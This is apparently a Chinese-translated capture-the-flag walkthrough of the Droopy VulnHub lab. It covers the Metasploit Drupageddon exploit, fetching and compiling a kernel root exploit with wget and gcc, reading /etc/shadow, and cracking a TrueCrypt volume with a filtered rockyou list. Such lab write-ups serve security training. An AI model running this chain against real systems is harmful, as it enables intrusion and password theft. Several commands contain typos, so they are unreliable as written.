最新消息:

CTF夺旗挑战!看老外如何玩转!

原创翻译 Eternal 1176浏览 0评论

在这篇文章中,我们将完成一个 CTF系列的 root2boot 挑战!这个演练将在 droopy 这个漏洞框架上完成,这是一个有一定难度的框架平台。我们可以从这里下载到:https://download.vulnhub.com/droopy/ 。

演练开始:

首先让我们来确定我们要攻击的目标,利用 IP 扫描工具 netdiscover 来查找目标 IP:

netdiscover

1

我们要攻击的目标是 192.168.1.103 ,确定目标后我们再利用 nmap 来进行服务端口的扫描:

nmap -A 192.168.1.103

2

通过以上简单的扫描,我们可以看到目标开放了 80 端口,并且使用了带有利用漏洞的 Drupal 7 版本(Drupal是使用PHP语言编写的开源内容管理框架(CMF)),在得到以上信息后,下面我们使用 MSF 来对漏洞进行利用!

search drupal

3

我们使用一下利用模块:

use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (目标机器IP)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit

4

在成功利用了漏洞后,我们得到了一个 meterpreter 的 session ,为了有一个更加直观的显示路径,我们接着使用如下命令,来进入  droopy的终端界面:

hell

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

进入终端界面后,我们首先来查看该目标系统的内核版本:

lsb_release -a

5

通过以上命令查看,我们得知 该乌班图系统的内核版本为 Ubuntu 14.04 。我们通过 exploit-db.com 这个网站来查找该版本的 exploit !如下:我们成功找到了该版本的 exploit !

6

由于该 exploit 无法再 MSF上直接利用,因此我们需要在目标系统上找到一个有写和执行权限的文件,来下载并执行 exploit !

find / -writable -type d 2>/dev/null

cd /tmp/

wget https://www.exlpoit-db.com/download/372928

下面我们来编译并运行 exploit 以获取 root 权限!

mv 37292 37292.c 

gcc 37292.c -o kernel 

chmod 777 kernel 

./kernel 

接着我们通过简单的命令查看,我们是否已经取得 root 权限:

whoami 

cd /root 

ls 

9

接着我们在目标系统上发现了一个名为 dave.tc 的文件,当我们使用浏览器打开它时,提示我们进行下载。我们只需将其拷贝到站点根目录下,进行下载即可!

Cp dave.tc /var/ww/html

10

下载完成后,我们使用 veracrypt 来打开它。veracrypt的下载地址:https://veracrypt.codeplex.com/wikipage?title=Downloads

当你打开 VeraCrypt 选择 1 它就会将硬盘挂载到 1 硬盘上。

11

当你尝试打开该文件时,会弹出一个密码输入框,要求我们输入密码。可是现在我们并没有密码,我们来破解密码!

我们进入到保存系统全部密码 hash 值得文件下:

cat /etc/shadow13

我们将得到的 hash 复制,并利用 online hash identifier 在线hash标识符查询来识别hash的加密算法。地址:onlinehashcrack.com 。我们从结果中得知,这里使用了   SHA512 进行加密!

15

在探索的同时,我们也找到了一封邮件。让我们阅读它。

cat /var/mail/www-data

16

从邮件内容中我们得到以下信息:

密码是11个字符。

密码和 academy 有联系!

以上的信息,能让我们定制出更精确地密码字典,和加快我们的爆破成功率!我们使用 rockyou.txt 字典,但是再使用前我们来根据以上规则进行精确过滤,命令如下:

awk ‘length($1) == 11 { print $1 }’ /usr/share/wordlists/rockyou.txt |egrep ‘^[[:lower:]]+academy’ > /root/Desktop/pass.txt17

接着我们使用 truecrack 来进行爆破!

truecrack –truecrypt /root/Download/dave.tc -k SHA512 -w ?root/Desktop/pass.txt

18

很快密码就被爆破出来了!

现在让我们再次使用 VeraCrypt 来打它。

19

成功挂载驱动到桌面!

20

我们双击打开它,进到 .secret 接着进到 .top 下,我们可以看到成功获取到了 flag.txt 文件!

21

打开它!

22

原创翻译,转载请注明来源 即刻安全

原文地址:http://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/

转载请注明:即刻安全 » CTF夺旗挑战!看老外如何玩转!

您必须 登录 才能发表评论!



合作伙伴